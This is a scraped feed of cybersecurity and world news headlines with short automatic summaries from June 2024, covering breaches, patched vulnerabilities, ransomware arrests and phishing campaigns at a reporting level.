          2024-06-13 https://www.bleepingcomputer.com/news/security/truist-bank-confirms-data-breach-after-stolen-data-shows-up-on-hacking-forum/
          Leading U.S. commercial bank Truist confirmed its systems were breached in an October 2023 cyberattack after a threat actor posted some of the company’s data for sale on a hacking forum. [...] "

          Autosummary: "


          Cuba welcomes Russian military ships to Havana

          rusia-ucrania
          2024-06-13 https://www.bbc.com/news/videos/c722m823612o
          The vessels are expected to stay on the island during the weekend as part of a military drill in the Caribbean. "

          Autosummary: "


          Cybersecurity jobs available right now: June 12, 2024

          ciber
          2024-06-12 https://www.helpnetsecurity.com/2024/06/12/cybersecurity-jobs-available-right-now-june-12-2024/

          Cloud Security Engineer | Metacore | Germany | Hybrid: As a Cloud Security Engineer, you will develop, implement, and maintain cloud security architecture, policies, and procedures. You will collaborate with game and infrastructure teams to identify, evaluate, and mitigate security risks, and integrate security into the company’s development lifecycle. Additionally, you will develop and further improve the security of cloud infrastructure, emphasizing automated, reusable, and architecturally sound solutions. Cloud Security Operations and … More

          The post Cybersecurity jobs available right now: June 12, 2024 appeared first on Help Net Security.

          "

          Autosummary: CSOC Analyst | Northrop Grumman | United Kingdom | Hybrid: As a CSOC Analyst, you will perform analytical duties including security monitoring, host- and network-based log analysis, correlation of network threat indicators and PCAP data, analytical triage, and incident response (both intrusion and privacy related). Senior Penetration Tester | Logisek | Greece | Remote: As a Senior Penetration Tester, you will conduct penetration testing and security assessments, and deliver clear and concise security reports to clients in Greece, the USA, Europe and the Middle East. Vice President Information Security | Influx | Indonesia | Remote: The Vice President Information Security will be responsible for protecting Influx from information security risks through the development, implementation, and maintenance of the company’s security program (policies, procedures, and standards). "


          Microsoft Issues Patches for 51 Flaws, Including Critical MSMQ Vulnerability

          exploits
          2024-06-12 https://thehackernews.com/2024/06/microsoft-issues-patches-for-51-flaws.html
          Microsoft has released security updates to address 51 flaws as part of its Patch Tuesday updates for June 2024. Of the 51 vulnerabilities, one is rated Critical and 50 are rated Important. This is in addition to 17 vulnerabilities resolved in the Chromium-based Edge browser over the past month. None of the security flaws have been actively exploited in the wild, with one of them listed as "

          Autosummary: Also resolved by Redmond are several other RCE bugs affecting Microsoft Outlook (CVE-2024-30103), Windows Wi-Fi Driver (CVE-2024-30078), and numerous privilege escalation flaws in Windows Win32 Kernel Subsystem (CVE-2024-30086), Windows Cloud Files Mini Filter Driver (CVE-2024-30085), and Win32k (CVE-2024-30082), among others. "


          Major cybersecurity upgrades announced to safeguard American healthcare

          ciber
          2024-06-12 https://www.helpnetsecurity.com/2024/06/12/american-healthcare-cybersecurity/

          Recent cyberattacks targeting the nation’s healthcare system have demonstrated the vulnerability of hospitals and payment systems. Providers across the health system had to scramble for funding after one attack on a key payment system. And some hospitals had to redirect care after another. These disruptions can take too long to resolve before full access to needed health care services or payment systems is restored. Cyberattacks against the American healthcare system rose 128% from 2022 to … More

          The post Major cybersecurity upgrades announced to safeguard American healthcare appeared first on Help Net Security.

          "

          Autosummary: As part of this initiative to improve security and resilience of rural hospital system, private sector partners have committed to the following: For independent Critical Access Hospitals and Rural Emergency Hospitals, Microsoft is extending its nonprofit program to provide grants and up to a 75% discount on security products optimized for smaller organizations. "


          Microsoft launches cybersecurity program to tackle attacks, protect rural hospitals

          ciber
          2024-06-12 https://www.helpnetsecurity.com/2024/06/12/microsoft-launches-cybersecurity-program-to-tackle-attacks-protect-rural-hospitals/

          Microsoft has unveiled a new cybersecurity program to support hospitals serving more than 60 million people living in rural America. In 2023, the healthcare sector reported more ransomware attacks than any other critical infrastructure sector and attacks involving ransomware against the healthcare sector were up nearly 130%. Cybersecurity attacks disrupt health care operations across the country and pose a direct threat to patient care and essential operations of hospitals. In rural communities these attacks can … More

          The post Microsoft launches cybersecurity program to tackle attacks, protect rural hospitals appeared first on Help Net Security.

          "

          Autosummary: “Rural hospitals face a unique challenge in cybersecurity, balancing limited resources with the increasing sophistication of cyberthreats, which puts patient data and critical healthcare infrastructure at risk,” said Alan Morgan, CEO of NRHA. “Healthcare should be available no matter where you call home, and the rise in cyberattacks threatens the viability of rural hospitals and impacts communities across the U.S.,” said Justin Spelhaug, corporate VP, Microsoft Philanthropies. "


          Unit21 automates the check investigation process for financial institutions

          financial
          2024-06-12 https://www.helpnetsecurity.com/2024/06/12/unit21-check-fraud-tools/

          Unit21 launched its advanced Check Fraud Prevention and Investigation features. This new suite of tools addresses the rising threat of check fraud, which causes increased financial losses across the banking industry each year. In fact, according to a recent Thomson Reuters report, check fraud accounted for 20% of all SAR filings, amounting to nearly 670,000 check fraud SARs filed by FIs in 2023. “Check fraud is a growing challenge for banks and credit unions, and … More

          The post Unit21 automates the check investigation process for financial institutions appeared first on Help Net Security.

          "

          Autosummary: By integrating advanced AI techniques, image analysis, and dark web monitoring, the new features allow FIs to proactively find and stop fraud loss before it enters deposit channels while also automating the verification process of checks within the institution. "


          Black Basta Ransomware May Have Exploited MS Windows Zero-Day Flaw

          exploits ransomware
          2024-06-12 https://thehackernews.com/2024/06/black-basta-ransomware-may-have.html
          Threat actors linked to the Black Basta ransomware may have exploited a recently disclosed privilege escalation flaw in the Microsoft Windows Error Reporting Service as zero-day, according to new findings from Symantec. The security flaw in question is CVE-2024-26169 (CVSS score: 7.8), an elevation of privilege bug in the Windows Error Reporting Service that could be exploited to achieve SYSTEM "

          Autosummary: "Analysis of an exploit tool deployed in recent attacks revealed evidence that it could have been compiled prior to patching, meaning at least one group may have been exploiting the vulnerability as a zero-day," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News. "


          New Phishing Campaign Deploys WARMCOOKIE Backdoor Targeting Job Seekers

          financial
          2024-06-12 https://thehackernews.com/2024/06/new-phishing-campaign-deploys.html
          Cybersecurity researchers have disclosed details of an ongoing phishing campaign that leverages recruiting- and job-themed lures to deliver a Windows-based backdoor named WARMCOOKIE. "WARMCOOKIE appears to be an initial backdoor tool used to scout out victim networks and deploy additional payloads," Elastic Security Labs researcher Daniel Stepanic said in a new analysis. "Each sample is compiled "

          Autosummary: "This LNK file points to a batch script (BAT) hosted on the same server, which, upon user click, could potentially trigger additional malicious operations," Trustwave said, adding it could not retrieve the batch script due to the server being unresponsive. "


          China-Backed Hackers Exploit Fortinet Flaw, Infecting 20,000 Systems Globally

          exploits
          2024-06-12 https://thehackernews.com/2024/06/china-backed-hackers-exploit-fortinet.html
          State-sponsored threat actors backed by China gained access to 20,000 Fortinet FortiGate systems worldwide by exploiting a known critical security flaw between 2022 and 2023, indicating that the operation had a broader impact than previously known. "The state actor behind this campaign was already aware of this vulnerability in FortiGate systems at least two months before Fortinet disclosed the "

          Autosummary: "


          Police arrest Conti and LockBit ransomware crypter specialist

          exploits ransomware
          2024-06-12 https://www.bleepingcomputer.com/news/security/police-arrest-conti-and-lockbit-ransomware-crypter-specialist/
          The Ukraine cyber police have arrested a 28-year-old Russian man in Kyiv for working with Conti and LockBit ransomware operations to make their malware undetectable by antivirus software and conducting at least one attack himself. [...] "

          Autosummary: "


          Black Basta ransomware gang linked to Windows zero-day attacks

          exploits ransomware
          2024-06-12 https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-linked-to-windows-zero-day-attacks/
          The Cardinal cybercrime group (Storm-1811, UNC4394), which operates the Black Basta ransomware, is suspected of exploiting a Windows privilege escalation vulnerability, CVE-2024-26169, before a fix was made available. [...] "

          Autosummary: [Figure: Demonstration of the CVE-2024-26169 exploit used by Black Basta (Source: BleepingComputer)] A fascinating aspect of Symantec’s findings is that one variant of the exploit tool has a compilation timestamp dated February 27, 2024, while a second sample was built even earlier, on December 18, 2023. "


          Acronis XDR enhances EDR with comprehensive cybersecurity for MSPs

          ciber
          2024-06-12 https://www.helpnetsecurity.com/2024/06/12/acronis-xdr-enhances-edr-with-comprehensive-cybersecurity-for-msps/

          Acronis has introduced Acronis Advanced Security + XDR, the newest addition to the company’s security solution portfolio. Easy to deploy, manage, and maintain, Acronis XDR expands on the current endpoint detection and response (EDR) offering and delivers complete, natively integrated, highly efficient cybersecurity with data protection, endpoint management, and automated recovery specifically built for managed service providers (MSPs). Cyberattacks have become increasingly sophisticated due to cybercriminals deploying AI and attack surfaces expanding, allowing businesses to … More

          The post Acronis XDR enhances EDR with comprehensive cybersecurity for MSPs appeared first on Help Net Security.

          "

          Autosummary: Easy to deploy, manage, and maintain, Acronis XDR expands on the current endpoint detection and response (EDR) offering and delivers complete natively integrated, highly efficient cybersecurity with data protection, endpoint management, and automated recovery specifically built for managed service providers (MSPs). "


          Google warns of actively exploited Pixel firmware zero-day

          exploits
          2024-06-12 https://www.bleepingcomputer.com/news/security/google-warns-of-actively-exploited-pixel-firmware-zero-day/
          Google has released patches for 50 security vulnerabilities impacting its Pixel devices and warned that one of them had already been exploited in targeted attacks as a zero-day. [...] "

          Autosummary: "


          New phishing toolkit uses PWAs to steal login credentials

          financial
          2024-06-12 https://www.bleepingcomputer.com/news/security/new-phishing-toolkit-uses-pwas-to-steal-login-credentials/
          A new phishing kit has been released that allows red teamers and cybercriminals to create progressive web apps (PWAs) that display convincing corporate login forms to steal credentials. [...] "

          Autosummary: When the PWA automatically launches, though, it will prompt the user to enter their credentials to log in, whether those are, for example, for a VPN product, Microsoft, AWS, or online store credentials. [Figure: X prompting visitors to install its PWA (Source: BleepingComputer)] Using PWAs to phish for credentials: a new phishing toolkit created by security researcher mr.d0x demonstrates how to create PWA apps that display corporate login forms, even with a fake address bar showing the normal corporate login URL to make it look more convincing. "


          Life360 says hacker tried to extort them after Tile data breach

          financial
          2024-06-12 https://www.bleepingcomputer.com/news/security/life360-says-hacker-tried-to-extort-them-after-tile-data-breach/
          Safety and location services company Life360 says it was the target of an extortion attempt after a threat actor breached and stole sensitive information from a Tile customer support platform. [...] "

          Autosummary: The exposed data "does not include more sensitive information, such as credit card numbers, passwords or log-in credentials, location data, or government-issued identification numbers, because the Tile customer support platform did not contain these information types," Hulls added. "


          Russian warships arrive in Cuba in show of force

          rusia-ucrania
          2024-06-12 https://www.bbc.com/news/articles/cg66g0neweko
          The visit is seen as Russia’s sabre-rattling, amid tensions with the West over Moscow’s invasion of Ukraine. "

          Autosummary: "


          Phishing emails abuse Windows search protocol to push malicious scripts

          financial
          2024-06-12 https://www.bleepingcomputer.com/news/security/phishing-emails-abuse-windows-search-protocol-to-push-malicious-scripts/
          A new phishing campaign uses HTML attachments that abuse the Windows search protocol (search-ms URI) to push batch files hosted on remote servers that deliver malware. [...] "

          Autosummary: [Figure: The search prompt and the "failsafe" link (Source: Trustwave)] In this case, the URL is for the Windows Search protocol to perform a search on a remote host using the following parameters: Query: Searches for items labeled "INVOICE. "


          CISA adds Arm Mali GPU Kernel Driver, PHP bugs to its Known Exploited Vulnerabilities catalog

          exploits Linux
          2024-06-12 https://securityaffairs.com/164488/hacking/cisa-adds-arm-mali-gpu-kernel-driver-php-bugs-to-its-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Mali GPU Kernel Driver, PHP bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability CVE-2024-4610 is a use-after-free issue that impacts Bifrost GPU Kernel Driver (all versions from r34p0 to r40p0) and Valhall […] "

          Autosummary: CVE-2024-4610, ARM Mali GPU Kernel Driver Use-After-Free Vulnerability; CVE-2024-4577, PHP-CGI OS Command Injection Vulnerability. The vulnerability CVE-2024-4610 is a use-after-free issue that impacts Bifrost GPU Kernel Driver (all versions from r34p0 to r40p0) and Valhall GPU Kernel Driver (all versions from r34p0 to r40p0). "


          Ukraine Police arrested a hacker who developed a crypter used by Conti and LockBit ransomware operation

          exploits ransomware
          2024-06-12 https://securityaffairs.com/164475/breaking-news/developer-crypter-conti-lockbit-ransomware.html
          The Ukraine cyber police arrested a Russian man for having developed the crypter component employed in Conti and LockBit ransomware operations. The Ukraine cyber police arrested a Russian man (28) for his role in developing a crypter used in Conti and LockBit ransomware operations. The man was arrested in Kyiv on April 18, 2024, as part of […] "

          Autosummary: Ukraine Police arrested a hacker who developed a crypter used by Conti and LockBit ransomware operation (Pierluigi Paganini, June 12, 2024). The Ukraine cyber police arrested a Russian man for having developed the crypter component employed in Conti and LockBit ransomware operations. "


          Google patches exploited Android zero-day on Pixel devices

          exploits
          2024-06-12 https://www.bleepingcomputer.com/news/security/google-patches-exploited-android-zero-day-on-pixel-devices/
          Google has released patches for 50 security vulnerabilities impacting its Pixel devices and warned that one of them had already been exploited in targeted attacks as a zero-day. [...] "

          Autosummary: To apply the security update, Pixel users must go to Settings > Security & privacy > System & updates > Security update, tap Install, and restart the device to complete the update process. "


          Preparing for a career in cybersecurity? Check out these statistics

          industry ciber
          2024-06-11 https://www.helpnetsecurity.com/2024/06/11/cybersecurity-jobs-skills-statistics-2024/

          This article includes excerpts from various reports that provide statistics and insights on cybersecurity jobs, skills shortages, and workforce dynamics. Lack of skills and budget slow zero-trust implementation Entrust | 2024 State of Zero Trust & Encryption Study | May 2024 Despite 60% of organizations reporting significant senior leadership support for zero trust, a lack of skills and budget are still cited as the biggest roadblocks to implementing these frameworks, highlighting a discrepancy between support … More

          The post Preparing for a career in cybersecurity? Check out these statistics appeared first on Help Net Security.

          "

          Autosummary: IDC | Enterprise Resilience: IT Skilling Strategies, 2024 | May 2024 IDC predicts that by 2026, more than 90% of organizations worldwide will feel the pain of the IT skills crisis, amounting to some $5.5 trillion in losses caused by product delays, impaired competitiveness, and loss of business. "


          Arm Warns of Actively Exploited Zero-Day Vulnerability in Mali GPU Drivers

          exploits
          2024-06-11 https://thehackernews.com/2024/06/arm-warns-of-actively-exploited-zero.html
          Arm is warning of a security vulnerability impacting Mali GPU Kernel Driver that it said has been actively exploited in the wild. Tracked as CVE-2024-4610, the use-after-free issue impacts the following products: Bifrost GPU Kernel Driver (all versions from r34p0 to r40p0) and Valhall GPU Kernel Driver (all versions from r34p0 to r40p0). "A local non-privileged user can make improper GPU memory "

          Autosummary: "


          China-Linked ValleyRAT Malware Resurfaces with Advanced Data Theft Tactics

          exploits industry
          2024-06-11 https://thehackernews.com/2024/06/china-linked-valleyrat-malware.html
          Cybersecurity researchers have uncovered an updated version of malware called ValleyRAT that’s being distributed as part of a new campaign. "In the latest version, ValleyRAT introduced new commands, such as capturing screenshots, process filtering, forced shutdown, and clearing Windows event logs," Zscaler ThreatLabz researchers Muhammed Irfan V A and Manisha Ramcharan Prajapati said. ValleyRAT "

          Autosummary: Next, the malware launches "WINWORD2013.EXE," a legitimate executable associated with Microsoft Word, using it to sideload "wwlib.dll" that, in turn, establishes persistence on the system and loads "xig.ppt" into memory. "


          Expert released PoC exploit code for Veeam Backup Enterprise Manager flaw CVE-2024-29849. Patch it now!

          exploits
          2024-06-11 https://securityaffairs.com/164407/hacking/veeam-cve-2024-29849-poc.html
          A proof-of-concept (PoC) exploit for the Veeam Backup Enterprise Manager authentication bypass flaw CVE-2024-29849 is publicly available. Researcher Sina Kheirkhah analyzed the Veeam Backup Enterprise Manager authentication bypass flaw CVE-2024-29849 and released a proof-of-concept exploit for it. The flaw CVE-2024-29849 is a critical vulnerability (CVSS score: 9.8) in Veeam Backup Enterprise Manager that could […] "

          Autosummary: “When I started to analyze this vulnerability, first I was kind of disappointed on how little information Veeam provided, just saying the authentication can be bypassed and not much more, however, just knowing it’s something to do with Authentication and the mitigation suggesting the issue has something to do with either “VeeamEnterpriseManagerSvc” or “VeeamRESTSvc” services, I began my patch diffing routine and realized the entry point, I’ll introduce VeeamRESTSvc also known as Veeam.Backup.Enterprise.RestAPIService.exe” reads the post published by the researcher. "


          TellYouThePass ransomware exploits recent PHP RCE flaw to breach servers

          exploits ransomware
          2024-06-11 https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-exploits-recent-php-rce-flaw-to-breach-servers/
          The TellYouThePass ransomware gang has been exploiting the recently patched CVE-2024-4577 remote code execution vulnerability in PHP to deliver webshells and execute the encryptor payload on target systems. [...] "

          Autosummary: [Figure: Malicious HTA file (Source: Imperva)] This file contains VBScript with a base64-encoded string that decodes into a binary, loading a .NET variant of the ransomware into the host’s memory, Imperva researchers explain. "


          Pure Storage confirms data breach after Snowflake account hack

          financial
          2024-06-11 https://www.bleepingcomputer.com/news/security/pure-storage-confirms-data-breach-after-snowflake-account-hack/
          Pure Storage, a leading provider of cloud storage systems and services, confirmed on Monday that attackers breached its Snowflake workspace and gained access to what the company describes as telemetry information [...] "

          Autosummary: More than 11,000 customers use Pure Storage’s data storage platform, including high-profile companies and organizations like Meta, Ford, JP Morgan, NASA, NTT, AutoNation, Equinix, and Comcast. "


          23andMe data breach under joint investigation in two countries

          financial
          2024-06-11 https://www.malwarebytes.com/blog/news/2024/06/23andme-data-breach-under-joint-investigation-in-two-countries
          Canada’s and the UK’s privacy authorities are going to investigate the data breach at 23andMe to assess what the company could have done better. "

          Autosummary: The privacy watchdogs are going to investigate: the scope of information that was exposed by the breach and potential harms to affected individuals; whether 23andMe had adequate safeguards to protect the highly sensitive information within its control; and whether the company provided adequate notification about the breach to the two regulators and affected individuals as required under Canadian and UK privacy and data protection laws. "


          Arm zero-day in Mali GPU Drivers actively exploited in the wild

          exploits
          2024-06-11 https://securityaffairs.com/164430/hacking/arm-zero-day-actively-exploited.html
          Semiconductor and software design company Arm warns of an actively exploited zero-day vulnerability in Mali GPU Kernel Driver. Arm is warning of an actively exploited zero-day vulnerability, tracked as CVE-2024-4610, in Mali GPU Kernel Driver. The vulnerability is a use-after-free issue that impacts Bifrost GPU Kernel Driver (all versions from r34p0 to r40p0) and Valhall GPU Kernel […] "

          Autosummary: "


          JetBrains warns of IntelliJ IDE bug exposing GitHub access tokens

          exploits
          2024-06-11 https://www.bleepingcomputer.com/news/security/jetbrains-warns-of-intellij-ide-bug-exposing-github-access-tokens/
          JetBrains warned customers to patch a critical vulnerability that impacts users of its IntelliJ integrated development environment (IDE) apps and exposes GitHub access tokens. [...] "

          Autosummary: "


          City of Cleveland shuts down IT systems after cyberattack

          government ciber
          2024-06-11 https://www.bleepingcomputer.com/news/security/city-of-cleveland-shuts-down-it-systems-after-cyberattack/
          The City of Cleveland, Ohio, is currently dealing with a cyberattack that has forced it to take citizen-facing services offline, including the public offices and facilities at Erieview and the City Hall. [...] "

          Autosummary: "


          Haiti forms new government as gang violence persists

          government
          2024-06-11 https://www.bbc.com/news/articles/c722xe8nzx5o
          A new government has been formed in Haiti as it tries to restore order in the violence-ravaged nation. "

          Autosummary: [Image: Garry Conille will act as prime minister and interior minister (Reuters)] Mr Conille’s attorney, Carlos Hercules, will be the minister for justice and public security, and Haiti’s ambassador to Unesco, Dominique Dupuy, will be the foreign affairs minister. "


          Cybersecurity pros change strategies to combat AI-powered threats

          ciber
          2024-06-10 https://www.helpnetsecurity.com/2024/06/10/ai-powered-cyber-threats-rise/

          75% of security professionals had to change their cybersecurity strategy in the last year due to the rise in AI-powered cyber threats, with 73% expressing a greater focus on prevention capabilities, according to Deep Instinct. Additionally, 97% of respondents are concerned their organization will suffer a security incident due to adversarial AI. “The biggest challenge for SecOps teams is keeping pace with the rapidly evolving threat landscape being driven by AI. These never-before-seen threats are … More

          The post Cybersecurity pros change strategies to combat AI-powered threats appeared first on Help Net Security.

          "

          Autosummary: The report, conducted by Sapio Research, surveyed 500 senior cybersecurity experts from companies with 1,000+ employees in the US operating in financial services, technology, manufacturing, retail, healthcare, public sector, or critical infrastructure. "


          Frontier Communications data breach impacted over 750,000 individuals

          financial
          2024-06-10 https://securityaffairs.com/164315/data-breach/frontier-communications-data-breach.html
          Frontier Communications is notifying over 750,000 individuals that their personal information was stolen in a recent cyber attack. Last week, the RansomHub ransomware group claimed to have stolen the information of over 2 million customers from the American telecommunications company Frontier Communications. The RansomHub group claimed to have stolen 5GB of data from the telecommunications […] "

          Autosummary: “Based on our investigation, we have determined that the third party was likely a cybercrime group, which gained access to, among other information, personally identifiable information.” reads the Form 10-Q (quarterly report of financial performance) filed by the company with the SEC in May. "


          AI’s role in accelerating vulnerability management

          exploits
          2024-06-10 https://www.helpnetsecurity.com/2024/06/10/ai-vulnerability-management-role/

          With its capability to analyze, predict, and automate, AI stands to reshape many corners of business, most notably cybersecurity. In the field of vulnerability management specifically, AI is poised to have a profound impact, enhancing two key areas: (1) providing quicker analysis and uncovering hidden threats, and (2) offering more effective risk reduction solutions. AI’s impact on vulnerability management is more than mere automation: it brings analytical speed unlike anything we’ve previously experienced. The capacity for rapid analysis … More

          The post AI’s role in accelerating vulnerability management appeared first on Help Net Security.

          "

          Autosummary: (1) Providing quicker analysis and uncovering hidden threats, and (2) offering more effective risk reduction solutions. AI’s impact on vulnerability management is more than mere automation: it brings analytical speed unlike anything we’ve previously experienced. AI to streamline vulnerability management: Artificial Intelligence has the potential to drastically transform risk reduction in vulnerability management by utilizing historical and organization-specific data to offer tailored suggestions and prioritize vulnerabilities according to an organization’s risk profile. With its capability to analyze, predict, and automate, AI stands to reshape many corners of business, most notably cybersecurity. "


          Sticky Werewolf targets the aviation industry in Russia and Belarus

          industry
          2024-06-10 https://securityaffairs.com/164345/hacking/sticky-werewolf-targets-aviation-industry.html
          Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus. Sticky Werewolf is a threat actor that was first spotted in April 2023, initially targeting public organizations in Russia and Belarus. The group has expanded its operations to various sectors, including a pharmaceutical company and a Russian research institute […] "

          Autosummary: Sticky Werewolf targets the aviation industry in Russia and Belarus (Pierluigi Paganini, June 10, 2024). Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus. "


          APT and financial attacks on industrial organizations in Q1 2024

          financial industry
          2024-06-10 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-q1-2024/
          This summary provides an overview of the reports of APT and financial attacks on industrial enterprises, as well as the related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities.

          Autosummary: According to the CSA, these operations have targeted various industries, including aerospace and defense, education, energy and utilities, governments, hospitality, manufacturing, oil and gas, retail, technology, and transportation. Targeted countries include the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the United Arab Emirates, and the US. According to them, victims are globally distributed, vary greatly in size and span multiple industries, including: global government and military departments, national telecommunications companies, defense contractors, aerospace, aviation, engineering, and others. Pawn Storm/Sofacy/APT28 attacks: TrendMicro reported that Pawn Storm (aka APT28, Sofacy, Fancy Bear, Sednit, and Forest Blizzard) launched NTLMv2 hash relay attacks between April 2022 and November 2023 to brute-force its way into government, defense, military, energy and transportation networks worldwide. StrelaStealer attacks: Palo Alto Networks researchers identified a wave of large-scale StrelaStealer campaigns that impacted more than 100 organizations in the EU and US, including manufacturing, utilities and energy, construction, high tech, and other industries. Some of the devices and software compromised by the attackers include Fortinet FortiGuard, PRTG Network Monitor appliances, ManageEngine ADSelfService Plus, FatePipe WARP, Ivanti Connect Secure VPN, and Cisco ASA, according to the Dragos report. So far, RedCurl has carried out more than 40 attacks: half of them in Russia, the rest in the UK, Germany, Canada, Norway, and Ukraine. Volt Typhoon CISA alert: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) published a joint guidance and advisory on February 7 focusing on the Chinese-speaking threat actor, Volt Typhoon, which infiltrated a critical infrastructure network in the United States and remained undetected for at least five years before being discovered. Attackers send phishing emails in the name of domestic government agencies (Roskomnadzor, Investigative Committee, Military Prosecutor’s Office, court orders, and other regulatory requirements) and trick recipients into launching a malicious file, after which they deliver the White Snake stealer to the victim’s computer.


          Wildfires threaten unique Brazil ecosystem

          latam
          2024-06-10 https://www.bbc.com/news/articles/crgg7rnlrylo
          The number of fire outbreaks so far this year is 10 times that in the same period in 2023.

          Autosummary: The number of fires from the start of the year up to 9 June has been 935% higher than in the same period last year, according to figures from Brazil’s National Institute for Space Research (INPE).


          Messi returns as Argentina beat Ecuador

          latam
          2024-06-10 https://www.bbc.com/sport/football/articles/c899rj41ereo
          Lionel Messi plays his first international for almost seven months as Argentina warm up for the Copa America with a 1-0 win over Ecuador.



          Scammers use fake X accounts to impersonate airlines

          financial
          2024-06-10 https://www.bbc.com/news/articles/cp3371r7l1vo
          Holidaymakers are warned about scams where fake social media accounts are used to impersonate airlines.



          London hospitals face blood shortage after Synnovis ransomware attack

          exploits ransomware
          2024-06-10 https://www.bleepingcomputer.com/news/security/london-hospitals-face-blood-shortage-after-synnovis-ransomware-attack/
          England’s NHS Blood and Transplant (NHSBT) has issued an urgent call to O Positive and O Negative blood donors to book appointments and donate after last week’s cyberattack on pathology provider Synnovis impacted multiple hospitals in London. [...]



          Exploit for critical Veeam auth bypass available, patch now

          exploits
          2024-06-10 https://www.bleepingcomputer.com/news/security/exploit-for-critical-veeam-auth-bypass-available-patch-now/
          A proof-of-concept (PoC) exploit for a Veeam Backup Enterprise Manager authentication bypass flaw tracked as CVE-2024-29849 is now publicly available, making it urgent that admins apply the latest security updates. [...]



          23andMe data breach under investigation in UK and Canada

          financial
          2024-06-10 https://www.bleepingcomputer.com/news/security/23andme-data-breach-under-investigation-in-uk-and-canada/
          Privacy authorities in Canada and the United Kingdom have launched a joint investigation to assess the scope of sensitive customer information exposed in last year’s 23andMe data breach. [...]

          Autosummary: 23andMe accounts breached in credential-stuffing attack: In January, genetic testing provider 23andMe confirmed that the attackers stole health reports and raw genotype data of affected customers in a five-month credential-stuffing attack from April 29 to September 27.


          Compliance Scorecard enhances its CaaS platform to improve MSPs’ cybersecurity posture

          ciber
          2024-06-10 https://www.helpnetsecurity.com/2024/06/10/compliance-scorecard-msps-cybersecurity/

          Compliance Scorecard has unveiled the latest version of its Compliance-as-a-Service (CaaS) platform. The updated platform now includes advanced risk management tools, improved asset management capabilities, and new compliance reporting methods designed to help MSPs strengthen their cybersecurity service offerings and unlock new revenue opportunities. “The new features collectively enhance the ability of MSPs to manage risks proactively and maintain a strong security posture, ultimately enhancing their clients’ governance, risk, and compliance (GRC) strategies,” said … More

          The post Compliance Scorecard enhances its CaaS platform to improve MSPs’ cybersecurity posture appeared first on Help Net Security.


          Autosummary: “The new features collectively enhance the ability of MSPs to manage risks proactively and maintain a strong security posture, ultimately enhancing their clients’ governance, risk, and compliance (GRC) strategies,” said Tim Golden, CEO of Compliance Scorecard.


          The number of known Snowflake customer data breaches is rising

          financial
          2024-06-10 https://www.helpnetsecurity.com/2024/06/10/snowflake-customer-data-breaches/

          LendingTree subsidiary QuoteWizard and automotive parts provider Advance Auto Parts have been revealed as victims of attackers who are trying to sell data stolen from Snowflake-hosted cloud databases. Snowflake says that their investigation is still ongoing, but continues to stand by the preliminary results: the attackers accessed customer accounts secured with single-factor authentication by leveraging credentials “previously purchased or obtained through infostealing malware.” Snowflake customers suffering data breaches US-based Snowflake is a cloud data storage … More

          The post The number of known Snowflake customer data breaches is rising appeared first on Help Net Security.


          Autosummary: The names of some of the victims have been revealed when attackers posted offers to sell the stolen data: Santander Group (compromise confirmed by the company, without mentioning Snowflake); Live Nation Entertainment subsidiary TicketMaster (confirmed by the company via SEC 8-K report, Snowflake identified as the third party in question by a Ticketmaster spokesperson); LendingTree, which confirmed that it has been notified by Snowflake that QuoteWizard “may have had data impacted by this incident”; Advance Auto Parts (data theft not officially confirmed by the company, but the dark web listing claims that a massive amount of customer and employee info has been stolen).


          More_eggs Malware Disguised as Resumes Targets Recruiters in Phishing Attack

          financial exploits
          2024-06-10 https://thehackernews.com/2024/06/moreeggs-malware-disguised-as-resumes.html
          Cybersecurity researchers have spotted a phishing attack distributing the More_eggs malware by masquerading it as a resume, a technique originally detected more than two years ago. The attack, which was unsuccessful, targeted an unnamed company in the industrial services industry in May 2024, Canadian cybersecurity firm eSentire disclosed last week. "Specifically, the targeted individual was a "

          Autosummary: It’s designed to support over 54 banks located in Austria, Belgium, Finland, France, Germany, Greece, Ireland, Italy, Luxembourg, and the Netherlands.


          Cybersecurity CPEs: Unraveling the What, Why & How

          ciber
          2024-06-10 https://thehackernews.com/2024/06/cybersecurity-cpes-unraveling-what-why.html
          Staying Sharp: Cybersecurity CPEs Explained. Perhaps even more so than in other professional domains, cybersecurity professionals constantly face new threats. To ensure you stay on top of your game, many certification programs require earning Continuing Professional Education (CPE) credits. CPEs are essentially units of measurement used to quantify the time and effort professionals spend on

          Autosummary: These courses delve deep into security topics like incident response, exposure management or cloud security, ensuring you gain valuable knowledge while racking up credits. Industry Events: Conferences, workshops, and webinars hosted by security companies, industry associations, prominent cybersecurity vendors or even your own employer can be treasure troves for CPEs. CPEs are best understood in terms of other professions: just like medical, legal and even CPA certifications require continuing education to stay up-to-date on advancements and industry changes, cybersecurity professionals need CPEs to stay informed about the latest hacking tactics and defense strategies. Self-paced over 4-5 hours, it delves into the fundamentals of Exposure Management, and Gartner’s Continuous Threat Exposure Management (CTEM) framework, which is their recommended way to put Exposure Management into an actionable and repeatable plan. CPE credits are crucial for maintaining certifications issued by various cybersecurity credentialing organizations, such as (ISC)², ISACA, and CompTIA.


          Azure Service Tags Vulnerability: Microsoft Warns of Potential Abuse by Hackers

          exploits
          2024-06-10 https://thehackernews.com/2024/06/azure-service-tags-vulnerability.html
          Microsoft is warning about the potential abuse of Azure Service Tags by malicious actors to forge requests from a trusted service and get around firewall rules, thereby allowing them to gain unauthorized access to cloud resources. "This case does highlight an inherent risk in using service tags as a single mechanism for vetting incoming network traffic," the Microsoft Security Response Center ( "



          Christie’s data breach impacted 45,798 individuals

          financial
          2024-06-10 https://securityaffairs.com/164372/data-breach/christies-data-breach-45k-individuals.html
